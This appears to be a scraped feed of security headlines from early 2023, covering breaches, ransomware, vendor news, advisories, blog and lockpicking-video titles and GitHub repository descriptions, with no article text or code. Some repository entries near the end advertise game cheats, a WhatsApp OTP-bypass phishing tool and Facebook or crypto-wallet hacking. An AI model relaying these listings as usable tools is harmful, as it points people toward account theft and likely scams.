Keepit introduces backup and recovery solution for Power BI users
Netwrix 1Secure empowers MSPs to secure clients from a single console
Pixalate iCloud Private Relay helps users measure their exposure to iCPR traffic
Wasabi Surveillance Cloud offloads surveillance footage from local storage directly to the cloud
HYCU R-Cloud protects all business-critical apps from on-premises to SaaS
NTT and Palo Alto Networks join forces to improve security management for enterprises
Radiant Logic acquires Brainwave GRC to strengthen security posture for customers
Google ads push ‘virtualized’ malware made for antivirus evasion
Crypto hack theft reached record high in 2022
What is an OSINT Tool - Best OSINT Tools 2023
Dan Streetman joins Tanium as CEO
Gem Security emerges from stealth and raises $11 million
Microsoft 365 trial offer blocks access to Windows 10 desktops
Passion botnet cyberattacks hit healthcare, as actors offer threat as DDoS-as-a-service 
Hackers weaponize Microsoft Visual Studio add-ins to push malware
Microsoft: Scan for outdated Office versions respects your privacy
Cyberattack on Fintech Firm Disrupts Derivatives Trading Globally
Hackers linked to North Korea targeted Indian medical org, energy sector - The Record from Recorded Future News
Feds get guilty plea in Ubiquiti data extortion case - The Record from Recorded Future News
Former Ubiquiti dev pleads guilty to trying to extort his employer
Patch Critical Bug Now: QNAP NAS Devices Ripe for the Slaughter
Rising ‘Firebrick Ostrich’ BEC Group Launches Industrial-Scale Cyberattacks
Threat Detection. Advent of cyber-2022 day 18 | by Fallen sky | Feb, 2023 | InfoSec Write-ups
Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 1 | by Yani | Jan, 2023 | InfoSec Write-ups
Enforce Zero Trust With East‑West Traffic Encryption in Kubernetes with Istio — Part 2 | by Yani | Feb, 2023 | InfoSec Write-ups
High Level Analysis of Custom Browsers | by Miguel Méndez Z. | Feb, 2023 | InfoSec Write-ups
PhotoBomb Hack the box Walkthrough — [HTB] | by Vignesh | Feb, 2023 | InfoSec Write-ups
Trust Army Beta 0.9: Complete On-Chain Missions on Your Smartphone | by Hacken.AI | Feb, 2023 | Medium
Tomorrow’s Threats, Today’s Solutions: Navigating Cybersecurity in the Next Decade | by Atharva Auti | Feb, 2023 | Medium
JSON and Encryption Keys. So what does an encryption key look… | by Prof Bill Buchanan OBE | Feb, 2023 | Medium
Purple Team “War” Story IV — Blue wins | by Chapter8 | Feb, 2023 | Medium
Account Takeover Guide. Hey guys, in this tutorial, I will be… | by Dheeraj Yadav | Feb, 2023 | InfoSec Write-ups
Pwning Kubernetes. This article provides an overview of… | by Yu Pengfei | CSG @ GovTech | Feb, 2023 | Medium
Kiss your passwords goodbye!. #4 of my Tech Predictions for 2023 | by Tim Frank Andersen | Predict | Feb, 2023 | Medium
Lazarus campaign exploits unpatched Zimbra devices, targets medical data
High-severity bug in F5 BIG-IP can lead to code execution and DoS
API management (APIM): What It Is and Where It’s Going
Last year was the worst on record for crypto hacks, as North Korean groups cash in - The Record from Recorded Future News
Arnold Clark Confirms Customer Data Compromised in Breach
Debian Security Advisory 5337-1
Debian Security Advisory 5338-1
Ubuntu Security Notice USN-5839-2
Crypto theft: North Korea-linked hackers stole $1.7b in 2022
Ubuntu Security Notice USN-5840-1
HPE, NetApp warn of critical open-source bug
WordPress Quick Restaurant 2.0.2 XSS / CSRF / IDOR / Missing Authorization
Google boosts bounties for open source fuzzing flaws • The Register
OpenSSH 9.2p1
Up to 29,000 unpatched QNAP storage devices are sitting ducks to ransomware
Zeek 5.0.6
Enter the hunter satellites preparing for space war
Ransomware attack on data firm ION could take days to fix -sources | Reuters
Debian Security Advisory 5335-1
Debian Security Advisory 5336-1
North Korean hackers stole research data in two-month-long breach
Cisco fixes bug allowing backdoor persistence between reboots
Threat Actors Use ClickFunnels to Bypass Security Services
S3 Ep120: When dud crypto simply won’t let go [Audio + Text]
Ransomware attack on ION Group impacts derivatives trading market
Why CISOs Should Care About Brand Impersonation Scam Sites
Inside Killnet: Pro-Russia Hacktivist Group's Support and Influence Grows
Lazarus Group Rises Again, to Gather Intelligence on Energy, Healthcare Firms
Discrepancies Discovered in Vulnerability Severity Ratings
Lazarus Group Attack Identified After Operational Security Fail
Women in CyberSecurity Calls for Participants for New Measuring Inclusion Workshops
My first Hall Of Fame with a chained Broken Access Control | by Naman Jain | Feb, 2023 | InfoSec Write-ups
QNAP warns of new bug prompting worries of potential Deadbolt ransomware exploitation - The Record from Recorded Future News
Data breach at Vice Media involved SSNs, financial info - The Record from Recorded Future News
TrickGate: Malicious Software Outwitting Antivirus for 6 Years
5 Steps to Comply with CISA's Phishing Guidance M-21-31
Experts warn of 2 flaws in open-source software ImageMagick
New Russian-Backed Gamaredon's Spyware Variants Targeting Ukrainian Authorities
Ransomware gang attempts to extort UK school by posting files about at-risk children - The Record from Recorded Future News
Scammers managed to slip crypto apps onto Apple, Google app stores - The Record from Recorded Future News
Photos: Cybertech Tel Aviv 2023, part 2
Record $3.8bn Stolen Via Crypto in 2022
Cybersecurity Budgets Are Going Up. So Why Aren't Breaches Going Down?
North Korean Hackers Exploit Unpatched Zimbra Devices in 'No Pineapple' Campaign
Not All E-Signatures Are Created Equal – Don't Get Caught Out
City of London on High Alert After Ransomware Attack
Researchers Warn of Crypto Scam Apps on Apple App Store
NikoWiper malware involved in Sandworm attack
30k Internet-exposed QNAP NAS hosts impacted by CVE-2022-27596
New Threat: Stealthy HeadCrab Malware Compromised Over 1,200 Redis Servers
Here's who intelligence insiders tip for the next GCHQ director - The Record from Recorded Future News
Hybrid cloud storage security challenges
The next cyber threat may come from within
50% of organizations have indirect relationships with 200+ breached fourth-party vendors
The emergence of trinity attacks on APIs
InterVision enhances its cloud and security services for mid-market organizations
Hornetsecurity unveils two tools to counter rise in phishing attacks and malicious links
Neustar Security Services introduces UltraDDR for DNS-based user protection
Content Delivery Network (CDN) FAQs
Certa joins forces with Sayari to improve third party management
Dremio and Privacera enhance data security governance capabilities on data lakehouses
SAP partners with Red Hat to enhance intelligent business operations
Zscaler Resilience prepares businesses for unpredictable events
New HeadCrab malware infects 1,200 Redis servers to mine Monero
Over 1,800 Android phishing forms for sale on cybercrime market
LockBit ransomware goes 'Green,' uses new Conti-based encryptor
Why You Need AI and Machine Learning to Combat Hands-on-Keyboard Attacks
Kurt Gaudette joins Dragos as VP of Global Threat Intelligence
RedSeal appoints Gregory Enriquez as CEO
Sentra raises $30 million to meet growing demand for data security in the cloud
Google Fi data breach let hackers carry out SIM swap attacks
Pro-Russia Killnet group hit Dutch and European hospitals
Russia-backed hacker group Gamaredon attacking Ukraine with info-stealing malware - The Record from Recorded Future News
Google Fi User Data Breached Through T-Mobile Hack
New Nevada Ransomware targets Windows and VMware ESXi systems
Arnold Clark customer data stolen in attack claimed by Play ransomware
CrowdStrike Announces Expanded Service Integrations with AWS
Command-Injection Bug in Cisco Industrial Gear Opens Devices to Complete Takeover
Password-stealing “vulnerability” reported in KeePass – bug or feature?
UK cybersecurity firm Darktrace’s shares dive as short sellers circle | Business
Online Eyewear Shop 1.0 SQL Injection
eCommerce Marketplace Platform CMS 1.7 Cross Site Scripting
eCommerce Marketplace Platform CMS 1.7 SQL Injection
Ubuntu Security Notice USN-4781-2
Ubuntu Security Notice USN-5837-1
Ubuntu Security Notice USN-5839-1
Ubuntu Security Notice USN-5837-2
Ubuntu Security Notice USN-5838-1
vmwgfx Driver File Descriptor Handling Privilege Escalation
io_uring Same Type Object Reuse Privilege Escalation
Packet Storm New Exploits For January, 2023
The Trends and Future with Cloud (PaaS and IaaS) – Erik Hart – CSP #107
Researchers Uncover New Bugs in Popular ImageMagick Image Processing Utility
‘Global markets’ impacted by ransomware attack on financial software company - The Record from Recorded Future News
GoodRx to pay $1.5 million fine for sharing customer health info with Google, Facebook - The Record from Recorded Future News
New DDoS-as-a-Service platform used in recent attacks on hospitals
Google Fi Confirms Data Breach, Hints At Link to T-Mobile Hack
Ransomware Attack Forces Closure of Nantucket Schools
Detecting OneNote (.One) Malware Delivery | by Micah Babinski | Jan, 2023 | Medium
So You Want To Get Into Cyber Security | by Tad Whitaker | Feb, 2023 | Medium
Kiss your passwords goodbye!. #4 of my Tech Predictions for 2023 | by Tim Frank Andersen | Feb, 2023 | Medium
BREAKING IN……to the Cybersecurity Industry: A Guide | by UmarFarouk | Jan, 2023 | Medium
Don’t Give Up On XSS! | Fun Firefox XSS | by Fırat | Feb, 2023 | InfoSec Write-ups
GOOGLE CHROME’S BIGGEST BLUNDER:. “HOW TO STAY SAFE FROM THE LATEST… | by Data Science meets Cyber Security | Feb, 2023 | InfoSec Write-ups
Ethical Bug Bounty — Learn from Practical Approach | by dotwiki | Feb, 2023 | Medium
HOW TO CRACK WPA/WPA2 WIFI NETWORK PASSWORD | by Frankline misango | Feb, 2023 | Medium
Which Programming Languages Do Hackers Use? | by Christian Koch | Jan, 2023 | Towards Data Science
Netflix Fails to Break Down Password Sharing Restrictions
Data thieves abuse Microsoft’s 'verified publisher' status • The Register
Apple’s focus on secrecy violated employee rights, US regulators find
Bankman-Fried barred from contacting FTX employees, using Signal | Reuters
Chegg given FTC order to bolster data security
Examining cybercriminal headhunting
US puts Russian businessman behind hack-and-trade scheme on trial
Prilex PoS Malware evolves to target NFC-enabled credit cards
K-12 schools in Tucson, Nantucket respond to cyberattacks - The Record from Recorded Future News
Vulnerability in Cisco industrial appliances is a potential nightmare (CVE-2023-20076)
DocuSign scam targeted more than 10,000 inboxes: report - The Record from Recorded Future News
Microsoft notifies UK customers affected by hackers abusing ‘verified publisher’ tag - The Record from Recorded Future News
OneNote Documents Increasingly Used to Deliver Malware
Over 29,000 QNAP devices vulnerable to code injection attacks
Hackers use new IceBreaker malware to breach gaming companies
Google Fi Users Caught Up in T-Mobile Breach
Researchers Claim High-Risk Vulnerabilities Found in 87% of All Container Images
Crypto scam apps infiltrate Apple App Store and Google Play
ChatGPT: A New Wave of Cybersecurity Concerns?
Almost all Organizations are Working with Recently Breached Vendors
BEC Group Uses Open Source Tactics in Hundreds of Attacks
LockBit Green ransomware variant borrows code from Conti one
Experts Warn of 'Ice Breaker' Cyberattacks Targeting Gaming and Gambling Industry
Thriving Dark Web Trade in Fake Security Certifications
All About Attacking JWT. JWT: The Weak Link in Your Security… | by Xcheater | Jan, 2023 | InfoSec Write-ups
Account Takeover Guide. Hey guys, in this tutorial, I will be… | by Dheeraj Yadav | Feb, 2023 | InfoSec Write-ups
The Importance of Backing Up Your Data for ICS Security | by Ismail Tasdelen | Jan, 2023 | InfoSec Write-ups
Fraudulent “CryptoRom” trading apps sneak into Apple and Google app stores
New SH1MMER Exploit for Chromebook Unenrolls Managed ChromeOS Devices
Prilex PoS Malware Evolves to Block Contactless Payments to Steal from NFC Cards
Amazon Still Selling T95 TV Box with Pre-Installed Malware
Video walkthrough: Cybertech Tel Aviv 2023
Nearly 30,000 QNAP Devices Exposed to New Bug
An IDOR vulnerability often hides many others | by Allam Rachid (zhero_) | Jan, 2023 | InfoSec Write-ups
Unlocking the Secrets of LSA. We are back again as I promised! We… | by Jevon Davis | Feb, 2023 | InfoSec Write-ups
Don’t Give Up On XSS! | Fun Firefox XSS | by Fırat | Feb, 2023 | InfoSec Write-ups
“Zero-Day Exploits: The Dark Side of Technology to your business” | by Joshua Arulsamy | Jan, 2023 | InfoSec Write-ups
GOOGLE CHROME’S BIGGEST BLUNDER:. “HOW TO STAY SAFE FROM THE LATEST… | by Data Science meets Cyber Security | Feb, 2023 | InfoSec Write-ups
Increasing your website’s security | by Adam J Sturge | Feb, 2023 | InfoSec Write-ups
My First Hall Of Fame with Web Cache Poisoning | by Karthikeyan Nagaraj | Jan, 2023 | InfoSec Write-ups
Network Fundamentals (OSI model, TCP/IP suite, IP addressing, subnetting) | by Ayush Verma | Jan, 2023 | InfoSec Write-ups
Online Income Generation: Balancing Opportunities and Risks in Cybersecurity | by Anthony Today | Feb, 2023 | InfoSec Write-ups
Phishing Scams Exposed: The Tricks Hackers Use and How to Defend Yourself | by Anthony Today | Feb, 2023 | InfoSec Write-ups
The Impact of Artificial Intelligence on Exploit Development | by Ismail Tasdelen | Jan, 2023 | InfoSec Write-ups
TrickGate, a packer used by malware to evade detection since 2016
Auditing Kubernetes with Open Source SIEM and XDR
Photos: Cybertech Tel Aviv 2023
Hackers Abused Microsoft's "Verified Publisher" OAuth Apps to Hack Corporate Email Accounts
As the anti-money laundering perimeter expands, who needs to be compliant, and how?
70% of CIOs anticipate their involvement in cybersecurity to increase
The future of vulnerability management and patch compliance
Mix of legacy OT and connected technologies creates security gaps
Cybersecurity Predictions for a Turbulent 2023
Additional Supply Chain Vulnerabilities Uncovered in AMI MegaRAC BMC Software
GitHub Reports Code-Signing Certificate Theft in Security Breach
OTAVA releases Security as a Service to protect users against all attack vectors
ThreatSpike Red makes offensive cybersecurity accessible to more organizations
Trulioo identity verification platform helps businesses achieve regulatory compliance
GroupSense VIP Monitoring service enables enterprises to proactively protect executives
Involta DRaaS+ secures critical business systems and data
New Sh1mmer ChromeBook exploit unenrolls managed devices
Red Hat and Oracle expand collaboration to standardize cloud operations
Over 29,000 QNAP devices unpatched against new critical flaw
Microsoft stops selling Windows 10 licenses a day early
Firmware Flaws Could Spell 'Lights Out' for Servers
The Dark Truth Behind Your Online Privacy | Medium
Phishers Of People. Recently I started having a weird… | by Chiafukamnanya Nwanonenyi | Jan, 2023 | Medium
Hypernative — CryptoSecOps, stopping zero day web3 cyber attacks, welcome to boldstart | by Ed Sim | boldstart ventures | Jan, 2023 | Medium
PoC of VMware vRealize Log Insight vulnerabilities said to launch RCE
IT Army of Ukraine gained access to 1.5GB archive from Gazprom
Report: Developers are most in demand on dark web - The Record from Recorded Future News
BOXX Insurance raises $14.4 million to help customers stay ahead of cyber threats
Russia's Sandworm APT Launches Swarm of Wiper Attacks in Ukraine
Phishers Trick Microsoft Into Granting Them 'Verified' Cloud Partner Status
Critical VMware RCE Vulnerabilities Targeted by Public Exploit Code
Poser Hackers Impersonate LockBit in SMB Cyberattacks
Pro-Russian DDoS attacks raise alarm in Denmark, U.S. - The Record from Recorded Future News
PoS malware can block contactless payments to steal credit cards
OpenAI releases tool to detect AI-written text
Microsoft: Over 100 threat actors deploy ransomware in attacks
Microsoft releases emergency updates to fix XPS display issues
GitHub Confirms Signing Certificates Stolen in Cyber-Attack, Revokes Them
Hospitals urged to tighten DDoS defenses after health data found on Killnet list
New Titan Stealer malware examined
Novel malware leveraged in embassy-targeted APT29 attacks
Experts released VMware vRealize Log RCE exploit
LockBit takes credit for November ransomware attack on Sacramento PBS station - The Record from Recorded Future News
ChatGPT Clone Apps Collecting Personal Data on iOS, Play Store
Microsoft Edge is getting split screen mode - here's how to enable it
Exploit released for critical VMware vRealize RCE vulnerability
DocuSign Brand Impersonation Attack Bypasses Security Measures, Targets Over 10,000
Suricata IDPE 6.0.10
Red Hat Security Advisory 2023-0553-01
Ubuntu Security Notice USN-5836-1
Red Hat Security Advisory 2023-0450-01
Ubuntu Security Notice USN-5833-1
Ubuntu Security Notice USN-5835-1
Ubuntu Security Notice USN-5835-2
Ubuntu Security Notice USN-5835-3
GitHub says hackers cloned code-signing certificates in breached repository
PHPJabbers Auto Classifieds Script 3.2 Cross Site Scripting
U.S. stops granting export licenses for China's Huawei - sources | Reuters
PHPJabbers Business Directory Script 3.2 Cross Site Scripting
KeePass disputes report of flaw that could exfiltrate a database
Ubuntu Security Notice USN-5834-1
Chromebook SH1MMER exploit promises admin jailbreak • The Register
Red Hat Security Advisory 2023-0556-01
Bill targets suicide hotline vulnerabilities after cyberattack on Intrado
Hikvision Remote Code Execution / XSS / SQL Injection
South Korea makes crypto crackdown a national priority • The Register
Red Hat Security Advisory 2023-0554-01
Control Web Panel Unauthenticated Remote Command Execution
Red Hat Security Advisory 2023-0552-01
Red Hat Security Advisory 2023-0499-01
Red Hat Security Advisory 2023-0526-01
Red Hat Security Advisory 2023-0536-01
Red Hat Security Advisory 2023-0530-01
Ubuntu Security Notice USN-5832-1
Red Hat Security Advisory 2023-0544-01
Red Hat Security Advisory 2023-0542-01
Red Hat Security Advisory 2023-0449-01
Red Hat Security Advisory 2023-0540-01
GitHub to revoke stolen code signing certificates for GitHub Desktop and Atom
How the war in Ukraine has strengthened the Kremlin's ties with cybercriminals - The Record from Recorded Future News
NFT company gets restraining order to freeze hacker’s online wallet - The Record from Recorded Future News
Using the Wazuh SIEM and XDR platform to meet PCI DSS compliance
Microsoft disables verified partner accounts used for OAuth phishing
Financial Services Targeted in 28% of UK Cyber-Attacks Last Year
Pro-Palestine hackers threaten Israeli chemical companies
You Don't Know Where Your Secrets Are
British government minister told council to keep quiet after ransomware attack - The Record from Recorded Future News
Why Cybersecurity Business Needs a Real-Time Collaboration Tool
Attackers used malicious "verified" OAuth apps to infiltrate organizations' O365 email accounts
Researchers Uncover Packer Used by Several Malware to Evade Detection for 6 Years
New Report Reveals NikoWiper Malware That Targeted Ukraine Energy Sector
Killnet Attackers DDoS US and Dutch Hospitals
GitHub code-signing certificates stolen (but will be revoked this week)
Microsoft Defender can now isolate compromised Linux endpoints
QNAP: Patch Critical Remote Code Injection Bug
Two US Doctors Convicted of $30m Medicare Fraud
Pro-Russia group Killnet targets US healthcare with DDoS attacks
Critical QNAP NAS vulnerability fixed, update your device ASAP! (CVE-2022-27596)
How I Found an Insecure Direct Object Reference in TikTok | by mrhavit | Jan, 2023 | Medium
Attack is the best defense: Password cracking with Network Sniffing and Dictionary Attack | by one Pelumi guy | Jan, 2023 | Medium
Discovered a Critical IDOR and Earned $900 for My First P1 Vulnerability! | by Abhisek R | Jan, 2023 | Medium
Blind XSS To SSRF. During bug hunting in a private bug… | by Akash c | Jan, 2023 | Medium
ChatGPT and Microsoft Sentinel — simplify the incident handling process | by Antonio Formato | Jan, 2023 | Medium
What’s inside the leaked Yandex source code? | by Daniel Bunte | Jan, 2023 | Medium
10 Japanese Concepts That Will Fire Your Self-Motivation For Certification Study | by Dave On Cyber | Jan, 2023 | Medium
How I was able to find 4 Cross-site scripting (XSS) on vulnerability disclosure program ? | by DrakenKun | Jan, 2023 | Medium
Work at Medium | by Jobs @ Medium | Jobs at Medium | Medium
Demystifying trending branches of Computer Science | by Dyuthi Ramesh | Jan, 2023 | Medium
QNAP Fixes Critical Vulnerability in NAS Devices with Latest Security Updates
Budget constraints force cybersecurity teams to do more with less
3 ways to stop cybersecurity concerns from hindering utility infrastructure modernization efforts
DigiCert releases new unified approach to trust management
Is President Biden's National Cybersecurity Strategy a good idea?
Pre-Auth RCE in Aspera Faspex: Case Guide for Auditing Ruby on Rails – Assetnote
GitHub - syg/proposal-symbol-proto: TC39 proposal for mitigating prototype pollution
Interview with a Lock Picker - Episode 22 - Knox Locks #lockpicking #locksport #interview - YouTube
10 Japanese Concepts That Will Fire Your Self-Motivation For Certification Study | by Dave On Cyber | Jan, 2023 | Medium
Cisco Releases Security Advisories for Multiple Products | CISA
New “MITRE ATT&CK-like” framework outlines software supply chain attack TTPs | CSO Online
Breaking Docker Named Pipes SYSTEMatically: Docker Desktop Privilege Escalation – Part 1
Hacker Group Releases 128GB Of Data Showing Russia's 'Wide-Ranging' Illegal Surveillance Of Citizens
GitHub - adityatelange/bhhb: Tool to view HTTP history exported from Burp Suite Community Edition
[L132] Mul-T-Lock 7x7 Pick, Gut, and Reassemble - YouTube
The missing piece: the need for product management in security teams – Matt's Life Bytes
Data of 10 million JD Sports customers accessed in cyber attack | Computer Weekly
(63) Miwa PR pick and partial gut (black belt) - YouTube
Shoutout Thursday - February 2nd, 2023 - YouTube
Release EMBA v1.2.1 · e-m-b-a/emba · GitHub
GitHub - marduc812/vscode-nmap-peek: A VS Code extension to preview XML nmap output
691. Union night latch lock picked and gutted | How to use a plug spinner to bypass the double lock - YouTube
archive.today
WireMock Cloud: Mock The APIs You Depend On
[174] Clavis T20 20 pin Japanese lock picked and gutted - YouTube
Vulnerability Tutorial: How to bypass CSP
Demystifiying SMPC (Secure multi-party computation) and its threat model
Unserializable, but unreachable: Remote code execution on vBulletin
(61) Mul-T-Lock Classic pick and gut (brown belt) - YouTube
President Biden's new cybersecurity policy allows U.S. agencies to preemptively hack into the computer networks of criminals and foreign governments.
Enhancing Digital Forensics with X-Ways X-Tensions: VirusTotal Plugin
Up to 29,000 unpatched QNAP storage devices are sitting ducks to ransomware | Ars Technica
NVD - CVE-2023-24059
Ronin 2.0.0 finally released! | Ronin
Assa Twin Maximum, picked and gutted - YouTube
Tools For Malware Development - YouTube
HeadCrab: A Novel State-of-the-Art Redis Malware in a Global Campaign
Researcher drops Lexmark RCE zero-day rather than sell vuln ‘for peanuts’ | The Daily Swig
Your Company's Bossware Could Get You in Legal Trouble
Brit says sorry after waving around nonce patent and leaning on sites to cough up • The Register
Paclock PL410-PRO LOTO Picked (/r/lockpicking blue belt pick) - YouTube
Unlocking the Secrets of LSA. We are back again as I promised! We… | by Jevon Davis | Feb, 2023 | InfoSec Write-ups
Precision Munitions for Denial of Service | Tales about Software Engineering
Prilex PoS Malware Blocks NFC Transactions to Steal Credit Card Data - SecurityWeek
The Role of AI in Threat Intelligence: Revolutionizing Cyber Security
Cyber experts work to write code in safer languages - The Washington Post
Green Belt Submission - YouTube
The Current State of Cyber Security • Eleanor Saitta & Aino Vonge Corry • GOTO 2022 - YouTube
690. Yale Y127/45 laminated padlock picked | This one gives the hacksaw blade pick a decent fight 🥊 - YouTube
Following the Scent of TrickGate: 6-Year-Old Packer Used to Deploy the Most Wanted Malware - Check Point Research
Blog Post Title | PixiePoint Security
PACLOCK 100A, pick and gut with reassembly. - YouTube
RCE in Avaya Aura Device Services – Assetnote
Confidential VMs: What Are They and Which Problems Do They Solve? - YouTube
RUKO Garant with GINS (equivalent of ASSA Twin Combi with gins) picked and gutted - YouTube
Vulnerability Summary for the Week of January 23, 2023 | CISA
Facebook
GitHub - bananabr/TimeException: A tool to find folders excluded from AV real-time scanning using a time oracle
New versions of Prilex PoS malware blocking NFC transactions | Securelist
(59) Twins CL duo by Harry Bow pick and gut - YouTube
Team82 Releases Splunk S2S Open-Source Client | Claroty
Just a moment...
Security Advisory: Remote Command Execution in binwalk - ONEKEY
296 🔐 Vintage Reg'd US Mail padlock with counter picked and gutted - YouTube
Action needed for GitHub Desktop and Atom users | The GitHub Blog
Learning CodeQL // Going Beyond Grep
OpenVEX Spec Adds Clarity to Supply Chain Vulnerability Warnings - SecurityWeek
The Good, Bad and Compromisable Aspects of Linux eBPF - Pentera
What's new in the CIS v2.0 benchmark for GCP | Steampipe Blog
Google Fi says hackers accessed customers' information • TechCrunch
VMware vRealize Log Insight VMSA-2023-0001 Technical Deep Dive – Horizon3.ai
How to identify and avoid malicious code in your software supply chain
Exposing Secrets Via SDLC Tools: The SonarQube Case
Mini Lock Monday Guard tiny Padlock + Newbie Giveaway - YouTube
Southern Arizona’s largest school district hit by cyber attack
Cybercrime groups offer six-figure salaries, bonuses, paid time off to attract talent on dark web | CyberScoop
GitHub says hackers cloned code-signing certificates in breached repository | Ars Technica
"Blue Balls" BlackCatThirteen CL ABUS TITALIUM 83AL/45 - YouTube
My dotfiles vim, zsh and etc. Manage in chezmoi.io
Proof of Concept code playing around with the OpenAI / GPT / ChatGPT API
Proof of concept plug-in manager for BZFS (not yet made)
jwt-security
security
spring-security-demo
Information_Security_Course
I am hacker
Proof of concept of a REST API that loads any yolo model and performs inference.
I am Hacker
Hiring and mentoring app for specially abled person for TSEC Hacks hackathon
Tis is project done for TSEC Hacks 23.
A proof of concept
Hacking the IKEA Obegränsad
Se
a bunch of js hacks
The main index for linking to all proof-of-concept git repos
Random acts of hacking on color fonts
A containerised, multi-user web app service created to practice using PostgreSQL, the Spring Framework (Security, Crypto, Data), and Docker Compose.
This is a Wifi security scanning library
swift-hacking-projects
Note and code for the course of Security and Network at the University of Birmingham.
hackingplayground
Code implementing an assembler and compiler for the Jack language on the Hack virtual machine architecture, as described in the NAND2Tetris course
An iframe sandbox element with the allow-popups flag could be bypassed when using noopener links. This could have led to security issues for websites relying on sandbox configurations that allowed popups and hosted arbitrary content. This vulnerability af
GuuVs ARK Survival Evolved PrivateCheat CRACKED AimBot ESP Different Fov Infinite Health Infinite Stamina Max Food Max Water Zero Weight Infinite Oxygen No Torpidity MORE FEATURES
SpringSecurityPOC
lightning-security 基于oauth2 client / form login / 以及 oauth central auth server 组成,属于个人级别的认证框架
BITCOIN-WALLET-ENDERE-O-HACKING-SPOOFING
Laboratorio 1 de Security Data Science
made for my machine learning workshop during UGA Hacks
Miniclip 8BallPool Prediction Hack Including AutoAim AutoPlay
# CTF-Learn Hello!!. This is a repository of my trips on CTF Learn. I am a beginner in the world of ethical hacking and ctf, in fact if you can give me some advice, I would appreciate it.
A collection of inspiring lists, manuals, cheatsheets, blogs, hacks, one-liners, cli/web tools and more.
hacker simulator
HaVeR HWID PrivateSpoofer UNIVERSAL UNBAN YOURSELF IN EVERY GAME BATTLEEYE RIOT VANGUARD AND MORE
The 4th consolidation project of "100 Days of SwiftUI" tutorial course from Paul Hudson's "Hacking with Swift" website. The app presents a list of friends, a list of their friends' friends (etc.), along with their respective details; the data is being con
A sample, template-driven implementation guide for proof of concept guides. Provides a starting environment to use a base for defining these IGs.
Compiler Hacking Sessions Information
Ethical-Hacking
(2023 Aptos Seoul Hack) A Gaming-focused Social Graph Service powered by Aptos network - React version
Project to testing json web token and AWS security polices.
information_security
Gimkit hack
Estudo de segurança com o modelo novo de 2023
WHATSAPP-HACKING-BYPASS-OTP-PHISHING
一些与安全相关的自定义starter集合
security
Proof of concept to create a 1-Click Deploy, copy-n-paste Huggingface name to deploy any HF Diffuser model
Chatbot powered by GPT-3 to assist user with assessing system security
A POC for Tessian <> Sentinel Integration using logic apps
Three-layer Intent-based Networking Architecture - proof-of-concept
Simple JWT authentication app on Spring Boot
tsec hacks
spring security framework
Proof of Concept: Not smart JIT for C# written in C#
Hack This Fall 3.0
Proof of concept XRD, compositions, and ClusterInstanceClasses for TAP to test dynamic service provisioning.
This Fishing Frenzy Booklet Hack is gonna make all your friends wanna use your bait.
Python course from Hack Bulgaria
Incognito spy hacking
spring security
Canvas Hack
Anyone getting banned is not my fault, but the fault of the player. All hacks will be updated frequently, and you can rely on me.
A terraform file to deploy 3 instances, alb,route53 and security group, using ansible to deploy install applications into the server
This Project to make exercises to review php and oop and php unit testing and connection with mysql and security in php and mvc git flow, every php topic in separate folder, i'll work with git flow
Angular 8 is an open source, TypeScript based frontend web application framework. Angular 8 has been released by Google's Angular community. starts with architecture of Angular 8,setup simple project, data binding, then walks through forms, templates, rou
PP_3_1_3_Boot_Security
test repository for UGA Hacks
Hi, I'm Bach Van Xuan Thong Information Security Student at UIT-VNU
A Micro-Farming RPG created in Unity by me as a small proof of concept.
Cyber security
springboot-security-example
A cache of AWS Security templates. Results may vary....
A proof of concept Diagnostic Orders implementation guide.
Web scraper written as an early project for my Web Application Security course, taken in Spring 2023.
Proof of concept of a shell component shared between web ERPs micro frontends.
Security-Program-Links
Spring-Security
Solution of python challenges on hacker rank
Advance Identity Protector helps you to save and protect your data. It will help you to access your emails, credit, social security, and other things. If you have this software no one can detect your data.
Proof of concept of a dashboard app for a web ERP using micro frontend.
Avatar Generations cheats and codes unlimited nature stones hacks guide
Proof of Concept for the usage of docker from docker
Proof of concept of a purchases app for a web ERP using micro frontend.
WebHacking101-
Proof-of-concept: Use Playwright to merge several URLs as a PDF
Prodigy hacks
Updated-Apex-legend-Hack-Aim-Esp-Wallhack-NoRecoil-Misc
security-research
API for building a proof of concept for a micro web ERP using micro frontends.
SilkWare-Apex-Legends-Hack-ESP-Aimbot-Free
Valorant-Hacks-by-MidiMuX
Cryptography-and-network-security-CSA51
Valorant-Cheat-Undetected-Hack
Escape-From-Tarkov-Cheat-EFT-Hack-Aimbot-Esp
Network Security Group and Diagnostic Setting module
Hello everybody! people call me is HackBaby, i'm newbie who just to learn hacking website.
SpringSecurityJWT
CSA-5166-Cryptography-and-Network-Security-
Valorant-Cheat-Undetected-Hack-2023
100 days of SwiftUI course by Paul Hudson
network_security
Apex-Legends-Hack-Undetected-Cheat-External-2023
jwt 토큰과 oauth 로그인을 통한 spring security 구성
Hacking into Solana smart contracts
This repository serves as a guide for gathering additional information on addresses that voted on Gitcoin Grants during the Hacking On The Hackathon event and the OpenData Community.
hacking with swift - iDine
Cat Snack Bar cheat codes unlimited gems hacks remove ads guide
BadKarma LLC's best hacking tool.
Shells for Fun
spring-security-3
4to hack de Python de SocialOplesk
For use with any production API that requires security
:star2: Springboot, Angular and JWT security - Example Project based on Northwind Order Processing
fb-hacking
Hacker House Tokyo (April 12 - April 17(TBD)) docs
Proof of concept for LCI v0.10.5 null pointer dereference
Notes and tasks related to web security and exploitation
This repository contains a proof of concept for deploying a function app using vnet integration and private endpoints.
Escape-From-Tarkov-Cheat-Hack-Injector
Proof of concept for LCI v0.15.5 Out-of-bounds read
This repository contains a proof of concept for the common azure integration services such as APIM, Functions, Service Bus, Logic Apps etc.
Spring Security + Keycloak 認証処理
Proof of concept for CVE-2022-44318
This repository contains a proof of concept aimed at exploring the use of GitHub Actions and GHAS
Spring-Boot-Security-updated
Junk drawer of NATS-specific routines and helpers (infrastructure) to speed along Go projects, often proof-of-concepts.
Proof of concept for generating reports from a nosql database
SecurityTest
Junk drawer of routines and helpers (infrastructure) to speed along Go projects, often proof-of-concepts.
Proof of concept for (CVE-2022-43343)
A Proof of Concept of Impersonate feature on Keycloak with JWT in .NET 7
user mange with spring security
The way to a senior hacker
Solves the "Halloween Invitation" CTF from Hack The Box
A repo for CAMP's security test.
SecurityEngineerReq
Learning security vulnerabilities in various coding languages
Red-Dead-Redemption-2-Cheat-RDR-2-Hack-GodMode-ESP-More
Introduction-Of-Hacking-
spring-jdbc-security-suth
Spring boot 3 + Spring Security 6 + Jwt Authentication
Team-Fortress-2-Hack-Aimbot-Visuals-Hvh
A new age VAPT automator, fully hackable
